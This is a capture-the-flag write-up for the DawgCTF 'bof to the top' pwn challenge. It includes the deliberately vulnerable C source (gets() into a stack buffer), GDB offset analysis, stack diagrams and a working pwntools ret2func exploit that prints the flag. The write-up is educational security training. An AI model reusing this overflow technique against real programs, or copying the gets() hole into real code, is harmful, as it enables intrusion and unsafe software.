## bof to the top

* **CTF:** DawgCTF
* **Category:** pwn
* **Points:** 100
* **Author(s):** b0uldrr
* **Date:** 11/04/20

----

### Challenge
```
Anything it takes to climb the ladder of success

nc ctf.umbccd.io 4000

Author: trashcanna
```

### Downloads
* [bof](bof)
* [bof.c](bof.c)

----

### Solution

Looking at the provided source code, we can see that we need to get to the `audition()` function which will print the flag. However, because it is not called by any other function there is no way to get there with the normal flow of the program. Fortunately, we can use one of 2 gets() calls in `get_audition_info()` to overflow our buffer and write over the return address on the stack. Importantly, we also have to pass 2 parameters to `audition()` (time and room_num) to satisfy the if gate and print the flag.

```c
#include "stdio.h"
#include "string.h"
#include "stdlib.h"

// gcc -m32 -fno-stack-protector -no-pie bof.c -o bof

void audition(int time, int room_num){
	char* flag = "/bin/cat flag.txt";
	if(time == 1200 && room_num == 366){
		system(flag);
	}
}

void get_audition_info(){
	char name[50];
	char song[50];
	printf("What's your name?\n");
	gets(name);
	printf("What song will you be singing?\n");
	gets(song);
}

void welcome(){
	printf("Welcome to East High!\n");
	printf("We're the Wildcats and getting ready for our spring musical\n");
	printf("We're now accepting signups for auditions!\n");
}

int main(){
	welcome();
	get_audition_info();
	return 0;
}
```

The binary is 32-bit, which means that pararmeters are passed on the stack.
```
$ file bof
bof: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=5709a36b6f4bc9dc8eba2c438456ce72bb319d93, for GNU/Linux 3.2.0, not stripped
```

Our stack in the _get\_audition\_info()_ looks something like this to begin with:

```
        higher addresses
|              ...             |
|        previous frame        |
+------------------------------+    --+
|    return address in main()  |      |--- The return address we need to overwrite to point to get_flag
+------------------------------+    --+
|          saved RBP           |
+------------------------------+    --+
|           RBP - 4            |      |
+------------------------------+      |
              ...                     |--- The local variable buffer stack space we can overflow
+------------------------------+      |
|          RBP - 100           |      |
+------------------------------+    --+
```

But we're going to overwrite the saved RBP with our junk overflow and then inject the address of audition over the top of the return address, and then our values for time and room_num. The order in which the parameters are stored on the stack is important. This is what our new stack will look like after our attack:

```
        higher addresses
|              ...             |
+------------------------------+    --+
|              366             |      |--- The value of the room_num parameter
+------------------------------+    --+
|             1200             |      |--- The value of the time parameter
+------------------------------+    --+
|      junk return address     |      |--- The return address of audition()... can fill with junk because we're not going to return
+------------------------------+    --+
|     address of audition()    |      |--- The return address
+------------------------------+    --+
|             junk             |      |--- Our old saved RBP, overwriten with junk
+------------------------------+    --+
|             junk             |      |
+------------------------------+      |
              ...                     |--- The local variable buffer stack space we can overflow
+------------------------------+      |
|          RBP - 100           |      |
+------------------------------+    --+
```

I used objdump to get the address of the _audition()_ function.

```
$ objdump -d bof | grep "audition"
08049182 <audition>:
```

The last thing to determine was the offset to overflow before the return address. To do this, I opened the program in GDB and placed a breakpoint after the first `gets()` call in `get_audition_info()` then examined the location of my input on the stack and counted the offset by hand. After opening GDB, the commands I used were:

* `disas get_audtion_info` - disassemble the `get_audition_info` function to look for an appropriate breakpoint address
* `b *0x080491f4` - set a breakpoint after the first `gets()` call in `get_audition_info`
* `r` - run the program
* `aaaabbbbccccdddd` - This is my input at the first `gets()` call. Input a some recognisable data so we can see in in the stack at our breakpoint, which should trigger immediately after this input
* `x/40wx $esp` - At the breakpoint, now examine the 40 words from the stack pointer

![breakpoint](images/breakpoint.png)

At our breakpoint we can see:
* EBP is at 0xffffd2b8 and holds a value of 0xffffd2c8
* Our input (aaaabbbbccccdddd) is displayed as hex values (61, 62, 63 and 64 respectively)
* If we count from the beginning our our input to the start of the return address on the stack, it is exactly 62 bytes. That is our overflow amount.


Now we have everything we need to conduct our attack. I wrote a python script to automate it.

```python
#! /usr/bin/python3
import pwn

local = False

if local:
    conn = pwn.process("./bof")
else:
    conn = pwn.remote("ctf.umbccd.io", 4000)

payload  = b'a' * 62                # Fill up the buffer to the start of the return instruction pointer
payload += pwn.p32(0x08049182)      # Overwrite the return instruction pointer with the address of audition()
payload += b'aaaa'                  # Push a junk return address for audition() to the stack
payload += pwn.p32(1200)            # Push the required value for the time parameter
payload += pwn.p32(366)             # Push the required value for the room_num parameter

# Generate payload to examine the stack in GDB
#f = open("payload.hex", "wb")
#f.write(payload)

print(conn.recvuntil("name?\n").decode())
conn.sendline(payload)
print(conn.recvuntil("singing?\n").decode())
conn.sendline("nope!")                          # It doesn't matter what we put in this buffer, as long as we don't overflow it too much...
print(conn.recvall().decode())
```

And running it...

```
$ ./soln.py 
[+] Opening connection to ctf.umbccd.io on port 4000: Done
Welcome to East High!
We're the Wildcats and getting ready for our spring musical
We're now accepting signups for auditions!
What's your name?

What song will you be singing?

[+] Receiving all data: Done (20B)
[*] Closed connection to ctf.umbccd.io port 4000
DawgCTF{wh@t_teAm?}
```

### Flag 
```
DawgCTF{wh@t_teAm?}
```
